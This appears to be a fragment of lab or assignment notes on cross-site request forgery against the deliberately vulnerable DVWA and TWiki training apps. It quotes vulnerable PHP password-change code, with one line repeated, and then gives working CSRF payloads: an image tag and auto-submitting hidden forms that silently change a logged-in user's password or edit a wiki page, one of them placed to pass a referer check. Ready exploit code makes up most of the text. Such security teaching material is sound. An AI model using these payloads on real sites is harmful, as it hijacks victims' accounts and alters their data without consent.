// vulnerabilities/csrf/source/low.php if (isset($_GET['Change'])) { // Turn requests into variables $pass_new = $_GET['password_new']; $pass_conf = $_GET['password_conf']; if (($pass_new == $pass_conf)){
// vulnerabilities/csrf/source/low.php if (isset($_GET['Change'])) { // Turn requests into variables $pass_new = $_GET['password_new']; $pass_conf = $_GET['password_conf']; if (($pass_new == $pass_conf)){
<img src="http://192.168.1.103/dvwa/ vulnerabilities/csrf/?Change=true&password_new=santa&password_conf=santa" />
// vulnerabilities/csrf/source/medium.php if (isset($_GET['Change'])) { // Checks the http referer header if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){ // Turn requests into variables $pass_new = $_GET['password_new']; $pass_conf = $_GET['password_conf']; if ($pass_new == $pass_conf){
<iframe src="/csrf-exploits/127.0.0.1/medium.html"></iframe/>
<!-- /csrf-exploits/127.0.0.1/medium.html --> <form name="frmCSRF" action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET"> <input type="hidden" name="Change" value="true" /> <input type="hidden" name="password_new" value="xkcd" /> <input type="hidden" name="password_conf" value="xkcd" /> </form> <script type="text/javascript"> document.body.onload = function() { document.frmCSRF.submit(); } </script>
<form name="frmCSRF" action="http://192.168.1.103/twiki/bin/save/Main/yippie"> <input type="hidden" name="cmd" value="" /> <input type="hidden" name="formtemplate" value="" /> <input type="hidden" name="topicparent" value="" /> <input type="hidden" name="text" value="hurray" /> </form> <script type="text/javascript"> document.body.onload = function() { document.frmCSRF.submit(); } </script>
assignments.part(2);